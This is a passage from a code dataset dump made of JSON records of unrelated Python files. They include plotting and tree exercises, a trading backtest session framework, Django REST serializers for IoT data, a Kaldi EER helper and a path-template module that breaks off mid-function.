plt.xlabel(\"x-axis\")\n# plt.ylabel(\"y-axis\")\n# plt.show()\n\ndata = pd.read_csv('countries.csv')\n# us_data = data[data.country == 'United States']\n# china_data = data[data.country == 'China']\n# \n# plt.plot(us_data.year, us_data.population/10**6)\n# plt.plot(us_data.year, china_data.population/10**6)\n# plt.legend(['United States', 'China'])\n# plt.xlabel('year')\n# plt.ylabel('population')\n# plt.show()\n\ntestdata = data[data.country == 'China']\nprint(testdata)\n","sub_path":"scrap/matplot.py","file_name":"matplot.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"336085072","text":"n, inp = input(\"Enter Input : \").split(\"/\")\nn = int(n)\ninp = inp.split()\ninp = list(map(int, inp))\n\nif (n+1)//2 >= len(inp):\n i = 0\n while len(inp) < n:\n inp.insert(0, -111)\n i += 1\n\n def cal(cur):\n\n if inp[cur] != -111:\n return\n\n cal(2*cur+1)\n cal(2*cur+2)\n\n x = min(inp[2*cur+2], inp[2*cur+1])\n inp[cur] = x\n inp[2*cur+1] -= x\n inp[2*cur+2] -= x\n\n\n cal(0)\n print(sum(inp))\n\nelse:\n print(\"Incorrect Input\")","sub_path":"7TreeAVL/3TreeRough.py","file_name":"3TreeRough.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"592809091","text":"\"\"\"\nSession (TradingSession or BackTestSession)\n strategy\n data_handler\n portfolio_handler:\n strategy\n position_sizer\n risk_manager\n statistics\n compliance\n execution_handler\n\"\"\"\nimport datetime\nimport queue as queue\n\nfrom yatt.price import Price\nfrom yatt.position_sizer import FixedPositionSizer\nfrom yatt.risk_manager import DefaultRiskManager\nfrom yatt.portfolio import PortfolioHandler\nfrom yatt.compliance import CsvTradeLogCompliance\nfrom yatt.execution_handler import IBSimulatedExecutionHandler\nfrom yatt.statistics import TearsheetStatistics\nfrom yatt.event import MarketEvent, OrderEvent, SignalEvent, FillEvent\n\n\nclass Session(object):\n \"\"\"\n Session base class: Do not instantiate\n \"\"\"\n def __init__(self, strategy, data_handler, trading, **kwargs):\n 
self.trading = trading\n # Strategy\n self.strategy = strategy\n # DataHandler\n self.data_handler = data_handler\n # PositionSizer\n position_sizer = kwargs.pop('position_sizer', FixedPositionSizer())\n # RiskManager\n risk_manager = kwargs.pop('risk_manager', DefaultRiskManager())\n # Statistics\n statistics = kwargs.pop('statistics', TearsheetStatistics())\n # PortfolioHandler\n self.portfolio_handler = kwargs.pop('portfolio_handler',\n PortfolioHandler(strategy=strategy,\n position_sizer=position_sizer,\n risk_manager=risk_manager,\n statistics=statistics))\n\n strategy_name = self.strategy.name if self.trading else self.strategy.name + ' backtest'\n self.compliance = kwargs.pop('compliance', CsvTradeLogCompliance(strategy_name=strategy_name, **kwargs))\n # ExecutionHandler\n self.execution_handler = kwargs.pop('execution_handler', IBSimulatedExecutionHandler())\n # Event Queue\n self.events_queue = kwargs.pop('events_queue', queue.Queue())\n for o in [self.data_handler.streamer, self.strategy, self.portfolio_handler, self.execution_handler]:\n setattr(o, 'events_queue', self.events_queue)\n self.statistics = self.portfolio_handler.statistics\n # self.cur_time = None\n\n def _continue_loop_condition(self):\n raise NotImplementedError\n\n def _run_session(self):\n while self._continue_loop_condition():\n try:\n event = self.events_queue.get(False)\n except queue.Empty:\n self.data_handler.stream_next()\n else:\n if event is not None:\n if isinstance(event, MarketEvent):\n # self.cur_time = event.timestamp\n self.strategy.calculate_signals(event)\n self.portfolio_handler.on_market_event(event)\n elif isinstance(event, SignalEvent):\n self.portfolio_handler.on_signal(event)\n elif isinstance(event, OrderEvent):\n self.execution_handler.execute_order(event)\n elif isinstance(event, FillEvent):\n self.portfolio_handler.on_fill(event)\n self.compliance.record_trade(event)\n else:\n raise NotImplementedError('Unsupported event type!')\n\n def start(self):\n raise NotImplementedError\n\n\nclass TradingSession(Session):\n def __init__(self, **kwargs):\n super().__init__(trading=True, **kwargs)\n self.end_session_time = kwargs.pop('end_session_time', self.strategy.end_trading_time)\n if self.end_session_time is None:\n raise Exception('Must specify an end_session_time when live trading')\n\n def _continue_loop_condition(self):\n return datetime.datetime.now() < self.end_session_time\n\n def start(self, testing=False):\n print(('Running Trading Session until {0}'.format(self.end_session_time)))\n self._run_session()\n results = self.statistics.statistics\n print('---------------------------------')\n print('Trading completed.')\n return results\n\n\nclass BackTestSession(Session):\n def __init__(self, **kwargs):\n super().__init__(trading=False, **kwargs)\n self.start_date = kwargs.pop('start_date', datetime.datetime(1970, 1, 1))\n self.end_date = kwargs.pop('end_date', datetime.datetime.today())\n self.plot = kwargs.pop('plot', True)\n\n def set_date(self, start_date=None, end_date=None):\n if start_date:\n self.start_date = start_date\n self.data_handler.streamer.start_date = start_date\n if end_date:\n self.end_date = end_date\n self.data_handler.streamer.end_date = end_date\n\n def reset(self):\n self.statistics.reset()\n self.data_handler.streamer.reset()\n\n def _continue_loop_condition(self):\n return self.data_handler.streamer.continue_backtest\n\n def start(self):\n self.reset()\n print('Running Backtest...')\n self._run_session()\n results = self.statistics.statistics\n 
print('---------------------------------')\n print('Backtest completed.')\n print(self.statistics)\n if self.plot:\n self.statistics.plot_results()\n return results\n","sub_path":"yatt/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":5453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"348322026","text":"import numpy as np\ndef many_any(inputlist, k):\n nplist = np.array(inputlist)\n nplist = nplist == True\n countTrue=0;\n for tst in nplist:\n if (tst==1):\n countTrue+=1;\n if (countTrue==k):\n return True\n else:\n return False;\n \nOutput = many_any([True,False,False,True,False,True,False,False],5)\n\nprint(\"The Number of True Equals is:\"+str(Output));\n\nOutput = many_any([True,False,False,True,False,True,True,True],5)\n\nprint(\"The Number of True Equals is:\"+str(Output));\n\n","sub_path":"April 2018/Python Course 2018/python_hw6/many_any.py","file_name":"many_any.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"536228607","text":"# -*- coding: utf-8 -*-\n\nval = []\n\nwhile True:\n valor = int(input())\n if valor != 0:\n val.append(valor)\n else:\n break\n\nfor i in val:\n col = [2 ** h for h in range(i)]\n string = '{:' + str(len(str(col[i - 1] * (2 ** (i - 1))))) + 'd}'\n for k in col:\n for l in range(i):\n print(string.format(k * (2 ** l)), end=' ' if l < i - 1 else '\\n')\n print('')","sub_path":"python/1557.py","file_name":"1557.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"296468413","text":"#--- IOT_Server - api app serializers ----------------------------------------------\n#--- Original Release: December 2018\n#--- By: Conrad Eggan\n#--- Email: Conrade@RedCatMfg.com\n\nfrom rest_framework import serializers\nfrom api.models import Devices, Tags, ValueTypes, IotData\nfrom distutils.util import strtobool\n\n\nclass DeviceSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n class Meta:\n model = Devices\n fields = ('device_id', 'owner', 'name', 'description', 'type')\n\n\nclass OwnedDevices(serializers.PrimaryKeyRelatedField):\n #Limit device list to those owned by request.user\n def get_queryset(self):\n user = self.context['request'].user\n queryset = Devices.objects.filter(owner=user)\n return queryset\n\n\nclass TagSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n device = OwnedDevices(many=False)\n class Meta:\n model = Tags\n fields = ('tag_id', 'owner', 'name', 'description', 'device', 'value_type')\n\n\nclass DeviceTags(serializers.ModelSerializer):\n class Meta:\n model = Tags\n fields = ('tag_id', 'name', 'description', 'value_type')\n\n\nclass DeviceTagSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n device_tags = DeviceTags(many=True, read_only=True)\n\n class Meta:\n model = Devices\n fields = ('device_id', 'owner', 'name', 'description', 'type', 'device_tags')\n\n\nclass ValTypeSerializer(serializers.ModelSerializer):\n class Meta:\n model = ValueTypes\n fields = ('value_type_id', 'name', 'type')\n\n\nclass OwnedTags(serializers.PrimaryKeyRelatedField):\n #Limit tag list to those owned by request.user\n def get_queryset(self):\n user = self.context['request'].user\n queryset = Tags.objects.filter(device__owner=user)\n return 
queryset\n\n\nclass TagDataSerializer(serializers.ModelSerializer):\n value = serializers.CharField(max_length=100)\n type = serializers.CharField(read_only=True, source='tag.value_type.type')\n owner = serializers.ReadOnlyField(source='owner.username')\n tag = OwnedTags(many=False)\n\n class Meta:\n model = IotData\n fields = ('tag','owner','type','value','timestamp')\n\n def to_internal_value(self, data):\n values = super().to_internal_value(data)\n\n #Get value type for tag POSTED\n tag_type = Tags.objects.select_related('value_type').get(pk=data['tag']).value_type.type\n \n val = str(data['value'])\n\n #-- Save value POSTED in appropriate field based on tag value type --\n #Handle boolean value\n if tag_type == 'bool':\n try:\n values['value_bool'] = strtobool(val)\n except ValueError:\n msg = 'Boolean value required. (True, Yes, Y, On, 1, False, No, N, Off, 0)'\n raise serializers.ValidationError({data['tag']: msg})\n\n #Handle integer value\n elif tag_type == 'int':\n try:\n int(val)\n values['value_int'] = val\n except ValueError:\n raise serializers.ValidationError({data['tag']: 'Integer value required.'})\n \n #Handle decimal value\n elif tag_type == 'dec':\n try:\n float(val)\n except ValueError:\n raise serializers.ValidationError({data['tag']: 'Numeric value required.'})\n #check lengths of decimal number parts\n digit_max = IotData._meta.get_field('value_dec').max_digits\n dec_max = IotData._meta.get_field('value_dec').decimal_places\n if '.' in val:\n val_parts = val.split('.')\n else:\n val_parts = (val, \"0\")\n if len(val_parts[0]) > digit_max - dec_max:\n msg = f'Maximum of {digit_max-dec_max} digits before the decimal point exceeded.'\n raise serializers.ValidationError({data['tag']: msg})\n if len(val_parts[1]) > dec_max:\n msg = f'Maximum of {dec_max} digits after the decimal point exceeded.'\n raise serializers.ValidationError({data['tag']: msg})\n values['value_dec'] = val\n\n #Handle string value\n elif tag_type == 'string':\n values['value_text'] = val\n\n else:\n msg = f'ValueType not defined.'\n raise serializers.ValidationError({data['tag']: msg})\n\n del values['value']\n return values\n\n #Validate request.user is owner of tag\n def validate_tag(self, value):\n if self.context['request'].user != value.owner:\n msg = f\"\"\"Invalid pk \"{value.tag_id}\" - object does not exist.\"\"\"\n raise serializers.ValidationError(msg)\n return value\n\n def create(self, validated_data):\n return IotData.objects.create(**validated_data)\n\n","sub_path":"IOT_Server/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"407796349","text":"#!/usr/bin/env python3\n##\n# Copied from egs/sre10/v1/local/prepare_for_eer.py (commit 9cb4c4c2fb0223ee90c38d98af11305074eb7ef8)\n#\n# Given a trials and scores file, this script\n# prepares input for the binary compute-eer.\nimport sys\ntrials = open(sys.argv[1], 'r').readlines()\nscores = open(sys.argv[2], 'r').readlines()\nspkrutt2target = {}\nfor line in trials:\n spkr, utt, target = line.strip().split()\n spkrutt2target[spkr+utt]=target\nfor line in scores:\n spkr, utt, score = line.strip().split()\n print(\"{} {}\".format(score, spkrutt2target[spkr+utt]))\n","sub_path":"subtools/recipe/serialized-experiments/prepare_for_eer.py","file_name":"prepare_for_eer.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} 
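A minimal sketch of the pairing logic in the prepare_for_eer.py record above, run on toy in-memory data rather than files (the speaker/utterance IDs and scores below are invented for illustration): each trial's score is emitted together with its target/nontarget label, which per the record's own header is the input format for the compute-eer binary.
# Toy stand-ins for sys.argv[1] (trials) and sys.argv[2] (scores); real files are whitespace-separated.
trials = ["spk1 utt1 target", "spk1 utt2 nontarget"]
scores = ["spk1 utt1 3.2", "spk1 utt2 -1.7"]
spkrutt2target = {}
for line in trials:
    spkr, utt, target = line.strip().split()
    spkrutt2target[spkr + utt] = target
for line in scores:
    spkr, utt, score = line.strip().split()
    # prints "3.2 target" then "-1.7 nontarget"
    print("{} {}".format(score, spkrutt2target[spkr + utt]))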
+{"seq_id":"589526049","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @File : 对称的二叉树.py\r\n# @Author: ZhouChuang\r\n# @Datetime : 2020/2/21 下午11:28\r\n# @Desc :\r\n\r\n# -*- coding:utf-8 -*-\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\nclass Solution:\r\n def isSymmetrical(self, pRoot):\r\n # write code here\r\n if not pRoot:\r\n return True\r\n return self.compare(pRoot.left, pRoot.right)\r\n\r\n def compare(self, pRoot1, pRoot2):\r\n if not pRoot1 and not pRoot2:\r\n return True\r\n if not pRoot1 or not pRoot2:\r\n return False\r\n if pRoot1.val == pRoot2.val:\r\n if self.compare(pRoot1.left, pRoot2.right) and self.compare(pRoot1.right, pRoot2.left):\r\n return True\r\n return False\r\n","sub_path":"剑指offer/对称的二叉树.py","file_name":"对称的二叉树.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"225945132","text":"\"\"\"\nCopyright (c) 2012 Shotgun Software, Inc\n----------------------------------------------------\n\nManagement of file and directory templates.\n\n\"\"\"\n\nimport os\nimport re\n\nfrom tank_vendor import yaml\n\nfrom . import templatekey\nfrom .errors import TankError\nfrom .platform import constants\n\n\n\nclass Template(object):\n \"\"\"\n Object which manages the translation between paths and file templates\n \"\"\"\n _key_name_regex = \"[a-zA-Z_ 0-9]+\"\n \n \n @classmethod\n def _keys_from_definition(cls, definition, template_name, keys):\n \"\"\"Extracts Template Keys from a definition.\n\n :param definition: Template definition.\n :type definition: String.\n :param template_name: Name of template.\n :type template_name: String.\n :param keys: Mapping of key names to keys.\n :type keys: Dictionary.\n\n :returns: Mapping of key names to keys and collection of keys ordered as they appear in the definition.\n :rtype: List of Dictionaries, List of lists\n \"\"\"\n names_keys = {}\n ordered_keys = []\n # regular expression to find key names\n regex = r\"(?<={)%s(?=})\" % cls._key_name_regex\n key_names = re.findall(regex, definition)\n for key_name in key_names:\n key = keys.get(key_name)\n if key is None:\n msg = \"Template definition for template %s refers to key {%s}, which does not appear in supplied keys.\"\n raise TankError(msg % (template_name, key_name))\n else:\n if names_keys.get(key.name, key) != key:\n # Different keys using same name\n msg = (\"Template definition for template %s uses two keys\" +\n \" which use the name '%s'.\")\n raise TankError(msg % (template_name, key.name))\n names_keys[key.name] = key\n ordered_keys.append(key)\n return names_keys, ordered_keys\n \n def __init__(self, definition, keys, name=None):\n \"\"\"\n :param definition: Template definition.\n :type definition: String.\n :param keys: Mapping of key names to keys\n :type keys: Dictionary \n :param name: (Optional) name for this template.\n :type name: String.\n\n \"\"\"\n self.name = name\n # version for __repr__\n self._repr_def = self._fix_key_names(definition, keys)\n\n variations = self._definition_variations(definition)\n # We want them most inclusive(longest) version first\n variations.sort(cmp=lambda x, y: cmp(len(x), len(y)), reverse=True)\n\n # get format keys and types\n self._keys = []\n self._ordered_keys = []\n for variation in variations:\n var_keys, ordered_keys = self._keys_from_definition(variation, name, keys)\n self._keys.append(var_keys)\n self._ordered_keys.append(ordered_keys)\n\n # 
substitute aliased key names\n self._definitions = []\n for variation in variations:\n self._definitions.append(self._fix_key_names(variation, keys))\n\n # get definition ready for string substitution\n self._cleaned_definitions = []\n for definition in self._definitions:\n self._cleaned_definitions.append(self._clean_definition(definition))\n\n # string which will be prefixed to definition\n self._prefix = ''\n self._static_tokens = []\n\n def __repr__(self):\n class_name = self.__class__.__name__\n if self.name:\n return \"<%s %s: %s>\" % (class_name, self.name, self._repr_def)\n else:\n return \"<%s %s>\" % (class_name, self._repr_def)\n\n @property\n def definition(self):\n \"\"\"\n Property to access Template definition.\n \"\"\"\n # Use first definition as it should be most inclusive in case of variations\n return self._definitions[0]\n\n\n @property\n def keys(self):\n \"\"\"\n Returns keys for this template.\n \n :returns: a dictionary of TemplateKey objects, keyed by TemplateKey name.\n :rtype: dictionary \n \"\"\"\n # First keys should be most inclusive\n return self._keys[0].copy()\n\n def is_optional(self, key_name):\n \"\"\"\n Returns true if the given key name is optional for this template.\n \n Example: template: {Shot}[_{name}]\n is_optional(\"Shot\") --> Returns False\n is_optional(\"name\") --> Returns True\n \"\"\"\n # minimum set of required keys for this template\n required_keys = self.missing_keys({})\n if key_name in required_keys:\n # this key is required\n return False\n else:\n return True\n\n def missing_keys(self, fields, skip_defaults=False):\n \"\"\"\n Determines keys required for use of template which do not exist\n in the given fields.\n \n Example:\n \n >>> tk.templates[\"max_asset_work\"].missing_keys({})\n ['Step', 'sg_asset_type', 'Asset', 'version', 'name']\n \n \n :param fields: fields to test\n :type fields: mapping (dictionary or other)\n :param skip_defaults: If true, do not treat keys with default values as missing.\n :type skip_defaults: Bool.\n \n :returns: Fields needed by template which are not in the input keys or which have\n values of None.\n :rtype: list\n \"\"\"\n # find shortest keys dictionary\n keys = min(self._keys)\n return self._missing_keys(fields, keys, skip_defaults)\n\n def _missing_keys(self, fields, keys, skip_defaults):\n \"\"\"\n Compares two dictionaries to determine which keys in the second are missing in the first.\n \"\"\"\n if skip_defaults:\n required_keys = [key.name for key in keys.values() if key.default is None]\n else:\n required_keys = keys\n\n return [x for x in required_keys if (x not in fields) or (fields[x] is None)]\n\n def apply_fields(self, fields):\n \"\"\"\n Creates path using fields. Certain fields may be processed in special ways, for\n example Sequence fields, which can take a \"FORMAT\" string which will intelligently\n format an image sequence specifier based on the type of data being handled.\n For more information about special cases, see the main documentation.\n\n :param fields: Mapping of keys to fields. Keys must match those in template \n definition.\n :type fields: Dictionary\n\n :returns: Path reflecting field values inserted into template definition.\n :rtype: String\n \"\"\"\n return self._apply_fields(fields)\n\n def _apply_fields(self, fields, ignore_types=None):\n \"\"\"\n Creates path using fields.\n\n :param fields: Mapping of keys to fields. Keys must match those in template \n definition.\n :type fields: Dictionary\n :param ignore_types: Keys for which the defined type is ignored. 
This \n allows setting a Key whose type is int with a string value.\n :type ignore_types: List of strings.\n\n :returns: Path reflecting field values inserted into template definition.\n :rtype: String\n \"\"\"\n ignore_types = ignore_types or []\n\n # find largest key mapping without missing values\n keys = None\n # index of matching keys will be used to find cleaned_definition\n index = -1\n for index, cur_keys in enumerate(self._keys):\n missing_keys = self._missing_keys(fields, cur_keys, skip_defaults=True)\n if not missing_keys:\n keys = cur_keys\n break\n\n \n if keys is None:\n raise TankError(\"Tried to resolve a path from the template %s and a set \"\n \"of input fields '%s' but the following required fields were missing \"\n \"from the input: %s\" % (self, fields, missing_keys))\n\n # Process all field values through template keys \n processed_fields = {}\n for key_name, key in keys.items():\n value = fields.get(key_name)\n ignore_type = key_name in ignore_types\n processed_fields[key_name] = key.str_from_value(value, ignore_type=ignore_type)\n\n return self._cleaned_definitions[index] % processed_fields\n\n def _definition_variations(self, definition):\n \"\"\"\n Determines all possible definitions based on combinations of optional sections.\n \n \"{manne}\" ==> ['{manne}']\n \"{manne}_{ludde}\" ==> ['{manne}_{ludde}']\n \"{manne}[_{ludde}]\" ==> ['{manne}', '{manne}_{ludde}']\n \"{manne}_[{foo}_{bar}]\" ==> ['{manne}_', '{manne}_{foo}_{bar}']\n \n \"\"\"\n # split definition by optional sections\n tokens = re.split(\"(\\[[^]]*\\])\", definition)\n\n # seed with empty string\n definitions = ['']\n for token in tokens:\n temp_definitions = []\n # the regex returns some blank strings, skip them\n if token == '':\n continue\n if token.startswith('['):\n # check that the optional section contains a key\n if not re.search(\"{*%s}\" % self._key_name_regex, token): \n raise TankError(\"Optional sections must include a key definition.\")\n\n # Add definitions skipping this optional value\n temp_definitions = definitions[:]\n # strip brackets from token\n token = re.sub('[\\[\\]]', '', token)\n\n # check the non-optional part contains no dangling brackets\n if re.search(\"[\\[\\]]\", token): \n raise TankError(\"Square brackets are not allowed outside of optional section definitions.\")\n\n # make definitions with the token appended\n for definition in definitions:\n temp_definitions.append(definition + token)\n\n definitions = temp_definitions\n\n return definitions\n\n\n\n def _fix_key_names(self, definition, keys):\n \"\"\"\n Substitutes key name for name used in definition\n \"\"\"\n # Substitute key names for original key input names (key aliasing)\n substitutions = [(key_name, key.name) for key_name, key in keys.items() if key_name != key.name]\n for old_name, new_name in substitutions:\n old_def = r\"{%s}\" % old_name\n new_def = r\"{%s}\" % new_name\n definition = re.sub(old_def, new_def, definition)\n return definition\n\n def _clean_definition(self, definition):\n # Create definition with key names as strings with no format, enum or default values\n regex = r\"{(%s)}\" % self._key_name_regex\n cleaned_definition = re.sub(regex, \"%(\\g<1>)s\", definition)\n return cleaned_definition\n\n def _calc_static_tokens(self, definition):\n \"\"\"\n Finds the tokens from a definition which are not involved in defining keys.\n \"\"\"\n expanded_definition = os.path.join(self._prefix, definition)\n regex = r\"{%s}\" % self._key_name_regex\n tokens = re.split(regex, expanded_definition.lower())\n # Remove empty strings\n 
return [x for x in tokens if x]\n\n @property\n def parent(self):\n \"\"\"\n Returns Template representing the current Template's parent.\n \"\"\"\n raise NotImplementedError\n\n\n def validate(self, path, fields=None, skip_keys=None):\n \"\"\"\n Validates that a path fits the template.\n\n :param path: Path to validate\n :type path: String\n :param fields: Optional: Mapping of keys/values to add to the fields\n extracted from the path before validation happens. \n :type fields: Dictionary\n :param skip_keys: Optional: Field names whose values should be ignored\n :type skip_keys: List\n\n :rtype: Bool\n \"\"\"\n fields = fields or {}\n skip_keys = skip_keys or []\n # Path should split into keys as per template\n try:\n path_fields = self.get_fields(path, skip_keys=skip_keys)\n except TankError:\n return False\n # Check input values match those in path\n for key, value in fields.items():\n if (key not in skip_keys) and (path_fields.get(key) != value):\n return False\n return True\n\n def get_fields(self, input_path, skip_keys=None):\n \"\"\"\n Extracts key name, value pairs from a string.\n \n :param input_path: Source path for values\n :type input_path: String\n :param skip_keys: Optional keys to skip\n :type skip_keys: List\n\n :returns: Values found in the path based on keys in template\n :rtype: Dictionary\n \"\"\"\n path_parser = None\n fields = None\n\n for ordered_keys, static_tokens in zip(self._ordered_keys, self._static_tokens):\n path_parser = TemplatePathParser(ordered_keys, static_tokens)\n fields = path_parser.parse_path(input_path, skip_keys)\n if fields:\n break\n\n if fields is None:\n raise TankError(\"Template %s: %s\" % (str(self), path_parser.last_error))\n\n return fields\n\n\nclass TemplatePath(Template):\n \"\"\"\n Class for templates representing paths.\n \"\"\"\n def __init__(self, definition, keys, root_path, name=None):\n \"\"\"\n :param definition: Template definition.\n :type definition: String.\n :param keys: Mapping of key names to keys\n :type keys: Dictionary \n :param root_path: Path to project root for this template.\n :type root_path: String.\n :param name: (Optional) name for this template.\n :type name: String.\n\n \"\"\"\n super(TemplatePath, self).__init__(definition, keys, name=name)\n self._prefix = root_path\n\n # Make definition use the platform separator\n for index, rel_definition in enumerate(self._definitions):\n self._definitions[index] = os.path.join(*split_path(rel_definition))\n\n # get definition ready for string substitution\n self._cleaned_definitions = []\n for definition in self._definitions:\n self._cleaned_definitions.append(self._clean_definition(definition))\n\n # split the definition string into tokens around the format strings \n self._static_tokens = []\n for definition in self._definitions:\n self._static_tokens.append(self._calc_static_tokens(definition))\n\n @property\n def root_path(self):\n return self._prefix\n\n @property\n def parent(self):\n \"\"\"\n Creates Template instance for parent directory of current Template. 
\n \n :returns: Parent's template\n :rtype: Template instance\n \"\"\"\n parent_definition = os.path.dirname(self.definition)\n if parent_definition:\n return TemplatePath(parent_definition, self.keys, self.root_path, None)\n return None\n\n def _apply_fields(self, fields, ignore_types=None):\n relative_path = super(TemplatePath, self)._apply_fields(fields, ignore_types)\n return os.path.join(self.root_path, relative_path)\n\n\nclass TemplateString(Template):\n \"\"\"\n Template class for templates not representing paths.\n \"\"\"\n def __init__(self, definition, keys, name=None, validate_with=None):\n super(TemplateString, self).__init__(definition, keys, name=name)\n self.validate_with = validate_with\n self._prefix = \"@\"\n\n # split the definition string into tokens around the format strings \n self._static_tokens = []\n for definition in self._definitions:\n self._static_tokens.append(self._calc_static_tokens(definition))\n \n @property\n def parent(self):\n \"\"\"\n Strings have no parents\n \"\"\"\n return None\n\n\n def get_fields(self, input_path, skip_keys=None):\n \"\"\"\n Given a path, return a mapping of key values based on the template.\n \n :param input_path: Source path for values\n :type input_path: String\n :param skip_keys: Optional keys to skip\n :type skip_keys: List\n\n :returns: Values found in the path based on keys in template\n :rtype: Dictionary\n \"\"\"\n # add the path prefix, as the original design required the project root\n adj_path = os.path.join(self._prefix, input_path)\n return super(TemplateString, self).get_fields(adj_path, skip_keys=skip_keys)\n\n\n\n\ndef split_path(input_path):\n \"\"\"\n Split a path into tokens.\n\n :param input_path: path to split\n :type input_path: string\n\n :returns: tokenized path\n :rtype: list of tokens\n \"\"\"\n cur_path = os.path.normpath(input_path)\n cur_path = cur_path.replace(\"\\\\\", \"/\")\n return cur_path.split(\"/\")\n\n\nclass TemplatePathParser(object):\n \"\"\"\n Class for parsing a path for a known set of keys, and a known set of static\n tokens which should appear between the key values.\n \"\"\"\n def __init__(self, ordered_keys, static_tokens):\n \"\"\"\n :param ordered_keys: Template key objects in order that they appear in\n template definition.\n :param static_tokens: Pieces of definition not representing Template Keys.\n \"\"\"\n self.ordered_keys = ordered_keys\n self.static_tokens = static_tokens\n self.fields = {}\n self.input_path = None\n self.last_error = \"Unable to parse path\" \n\n def parse_path(self, input_path, skip_keys):\n \"\"\"\n Moves through a path in a linear fashion determining values for keys.\n\n :param input_path: Path to parse.\n :type input_path: String.\n :param skip_keys: Keys for which we do not need to find values.\n :type skip_keys: List of strings.\n\n :returns: Mapping of key names to values or None. \n \"\"\"\n skip_keys = skip_keys or []\n input_path = os.path.normpath(input_path)\n\n # if no keys, nothing to discover\n if not self.ordered_keys:\n if input_path.lower() == self.static_tokens[0].lower():\n # this is a template where there are no keys\n # but where the static part of the template is matching\n # the input path\n # (e.g. template: foo/bar - input path foo/bar)\n return {}\n else:\n # template with no keys - in this case not matching \n # the input path. 
Return for no match.\n return None\n \n\n self.fields = {}\n last_index = None # end index of last static token\n start_index = None # index of beginning of next static token\n end_index = None # end index of next static token\n key_index = 0 # index of key in ordered keys list\n token_index = 0 # index of token in static tokens list\n # crawl through input path\n while last_index < len(input_path):\n # Check if there are keys left to process\n if key_index < len(self.ordered_keys):\n # get next key\n cur_key = self.ordered_keys[key_index]\n key_name = cur_key.name\n else:\n # all keys have been processed\n key_name = None\n\n # Check that there are static tokens left to process\n if token_index < len(self.static_tokens):\n cur_token = self.static_tokens[token_index]\n \n start_index = self.find_index_of_token(cur_key, cur_token, input_path, last_index)\n if start_index is None:\n return None\n \n if cur_key.length is not None:\n # there is a minimum length imposed on this key\n if last_index and (start_index-last_index) < cur_key.length:\n # we may have stopped early; search again one step ahead\n start_index = self.find_index_of_token(cur_key, cur_token, input_path, start_index+1)\n if start_index is None:\n return None\n \n\n end_index = start_index + len(cur_token)\n else:\n # All static tokens used, go to end of string\n end_index = len(input_path)\n start_index = end_index\n\n # last index is None on first iteration only\n if last_index is not None:\n # Check we haven't previously processed all keys\n if key_index >= len(self.ordered_keys):\n msg = (\"Tried to extract fields from path '%s',\" +\n \" but path does not fit the template.\")\n self.last_error = msg % input_path\n return None\n \n if key_name not in skip_keys:\n value_str = input_path[last_index:start_index]\n processed_value = self._process_value(value_str, cur_key, self.fields)\n if processed_value is None:\n return None\n else:\n self.fields[key_name] = processed_value\n\n key_index += 1\n token_index += 1\n last_index = end_index\n return self.fields\n\n\n def find_index_of_token(self, key, token, input_path, last_index):\n \"\"\"\n Determines starting index of a sub-string in the remaining portion of a path.\n\n If possible, domain knowledge will be used to improve the accuracy.\n :param key: The key whose value should start after the token.\n :param token: The sub-string whose index we search.\n :param input_path: The path in which to search.\n :param last_index: The index in the path beyond which we shall search.\n\n :returns: The index of the start of the token.\n \"\"\"\n # in python 2.5 index into a string cannot be None\n last_index = last_index or 0\n\n input_path_lower = input_path.lower()\n # Handle keys which already have values (they exist more than once in definition)\n if key.name and key.name in self.fields:\n # value is treated as string as it is compared to input path\n # have to format correctly though otherwise search may fail!\n value = key.str_from_value(self.fields[key.name])\n \n # check that value exists in the remaining input path\n if value in input_path[last_index:]:\n value_index = input_path.index(value, last_index) + len(value)\n # check that token is in path after known value\n if token not in input_path_lower[value_index:]:\n msg = (\"Tried to extract fields from path '%s',\" + \n \" but path does not fit the template.\")\n self.last_error = msg % input_path\n return None\n\n start_index = input_path_lower.index(token, value_index)\n if start_index != value_index:\n msg = \"Template %s: Unable 
to find value for key %s in path %s\"\n self.last_error = msg % (self, key.name, input_path)\n return None\n else:\n msg = \"Template %s: Unable to find value for key %s in path %s\"\n self.last_error = msg % (self, key.name, input_path)\n return None\n else:\n # key has not been previously processed\n # Check that the static token exists in the remaining input string\n if token not in input_path_lower[last_index:]:\n msg = \"Tried to extract fields from path '%s', but path does not fit the template.\"\n self.last_error = msg % input_path\n return None\n\n start_index = input_path_lower.index(token, last_index) \n return start_index\n\n\n def _process_value(self, value_str, cur_key, fields):\n \"\"\"\n Checks value is valid both for its key and in relation to existing values for that key.\n \"\"\"\n value = cur_key.value_from_str(value_str)\n key_name = cur_key.name\n \n if fields.get(key_name, value) != value:\n msg = \"%s: Conflicting values found for key %s: %s and %s\"\n self.last_error = msg % (self, key_name, fields[key_name], value)\n return None\n\n if os.path.sep in value_str:\n msg = \"%s: Invalid value found for key %s: %s\"\n self.last_error = msg % (self, key_name, value)\n return None\n \n return value\n\ndef read_templates(pipeline_configuration):\n \"\"\"\n Creates templates and keys based on contents of templates file.\n\n :param pipeline_configuration: pipeline config object\n\n :returns: Dictionary of form {template name: template object}\n \"\"\"\n \n data = 